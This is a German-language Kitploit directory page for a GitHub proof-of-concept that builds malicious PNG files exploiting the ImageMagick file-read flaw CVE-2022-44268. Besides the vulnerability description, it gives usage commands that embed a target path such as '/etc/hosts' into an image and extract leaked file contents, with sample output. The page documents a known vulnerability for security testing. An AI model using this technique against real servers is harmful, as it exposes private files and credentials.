Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
cve-2022-44268 — Erzeugt bösartige PNG-Dateien, um die ImageMagick-LFI-Schwachstelle (CVE-2022-44268) zum beliebigen Dateilesen auszunutzen, mit Extraktionsskript für den Proof-of-Concept. | Kitploit
Tools/GitHubGitHub/pog-frog/cve-2022-44268
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstestsRed Teaming
GitHubpog-frog/cve-2022-44268

cve-2022-44268

Erzeugt bösartige PNG-Dateien, um die ImageMagick-LFI-Schwachstelle (CVE-2022-44268) zum beliebigen Dateilesen auszunutzen, mit Extraktionsskript für den Proof-of-Concept.

Repository anzeigen
12vor 3 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-44268

ImageMagick ist eine kostenlose und quelloffene plattformübergreifende Software-Suite zum Anzeigen, Konvertieren und Bearbeiten von Raster- und Vektorbilddateien. Sie kann über 200 Bilddateiformate lesen und schreiben. ImageMagick wird unter der Apache License 2.0 vertrieben. Es ist als Befehlszeilentools sowie als C-API und eine Reihe von C++-Klassen verfügbar. Wikipedia

ImageMagick Versionen 7.1.0-40 und darunter sind anfällig für eine Local-File-Inclusion-Schwachstelle. Die Schwachstelle beruht auf der unzureichenden Validierung von Benutzereingaben. Ein Angreifer kann diese Schwachstelle ausnutzen, indem er eine manipulierte PNG-Datei an das Ziel sendet. Eine erfolgreiche Ausnutzung dieser Schwachstelle könnte es einem Angreifer ermöglichen, beliebige Dateien auf dem Zielsystem zu lesen.

Danksagung an die Forscher, die dies entdeckt haben:

  • Bryan Gonzalez and the Ocelot Team

Erstellen Sie ein schädliches PNG, um ImageMagick 7.1.0-40 auszunutzen:

  • CVE-2022-44267: Denial of Service
  • CVE-2022-44268: Information Disclosure

Voraussetzungen

  • Python3
  • PIL (pip install Pillow)

Verwendung

Erstellen eines PNG mit generate.py:

root@kitploit:~
python3  generate.py -i input.png -f "/etc/hosts" -o exploit.png

     
  ______     __  _____                   ______                
 |  _ \ \   / / |  __ \                 |  ____|               
 | |_) \ \_/ /  | |__) |__   __ _ ______| |__ _ __ ___   __ _  
 |  _ < \   /   |  ___/ _ \ / _` |______|  __| '__/ _ \ / _` | 
 | |_) | | |    | |  | (_) | (_| |      | |  | | | (_) | (_| | 
 |____/  |_|    |_|   \___/ \__, |      |_|  |_|  \___/ \__, | 
                             __/ |                       __/ | 
                            |___/                       |___/  

    

   [*] ImageMagick LFI Exploit
   [*] Embedding Payload to read the target file
   [*] Exploit PNG generated: exploit.png

PoC

root@kitploit:~
python3 extract.py downloaded_img.png
127.0.0.1       localhost
::1             localhost ip6-localhost ip6-loopback
ff02::1         ip6-allnodes
ff02::2         ip6-allrouters

Haftungsausschluss: Sei ein braver Junge und benutze es nicht für böse Taten.

Tool herunterladen